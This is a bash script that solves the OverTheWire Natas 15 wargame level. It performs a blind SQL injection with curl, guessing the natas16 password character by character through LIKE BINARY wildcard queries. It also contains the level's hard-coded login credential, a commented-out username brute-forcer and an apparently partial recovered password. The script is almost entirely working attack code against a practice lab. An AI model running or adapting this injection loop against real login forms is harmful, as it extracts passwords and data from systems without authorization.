#! /bin/bash
#This user exists.	Executing query: SELECT * from users where username="natas16" and password like "________________________________"
#pass with 32 symb
#WaIHEacj63wnNIBROHeqi3p9t0m5nhm

access="natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"
site="http://natas15.natas.labs.overthewire.org?debug=1"

#data='username=" or username like "'
#wild="____" 
#
#for ((i=0;i<5;i++))
#do
# for char in {a..z} {A..Z} {0..9} 
#  do
#  bruteData="$data"${char}"$wild"
#
#  curlOut=$(curl -s -u "$access" "$site" --data-urlencode "$bruteData") 
#
#
#  final=$(echo "$curlOut" | grep 'Executing query:')
#  final=$(echo "$final" | sed 's:<br><div.*::' )
#  final=$(echo "$final" | sed 's:\(.*\)<br>\(.*\):\2\t\1:')
#  echo "$final"
#
#  result=$(echo "$curlOut" | grep 'This user exists.' | wc -l)
#  if [[ $result = 1 ]]
#   then 
#        data="$data"${char}
#        break
#        
#  fi
#
#  done
#wild=${wild::-1}
#done

data='username=natas16" and password like binary "'
wild="_______________________________" 

for ((i=0;i<33;i++))
do
 for char in {a..z} {A..Z} {0..9} 
  do
  bruteData="$data"$char"$wild"

  curlOut=$(curl -s -u "$access" "$site" --data-urlencode "$bruteData") 


  final=$(echo "$curlOut" | grep 'Executing query:')
  final=$(echo "$final" | sed 's:<br><div.*::' )
  final=$(echo "$final" | sed 's:\(.*\)<br>\(.*\):\2\t\1:')
  echo "$final"

  result=$(echo "$curlOut" | grep 'This user exists.' | wc -l)
  if [[ $result = 1 ]]
   then 
        data="$data"$char
        break
        
  fi

  done
wild=${wild::-1}
done
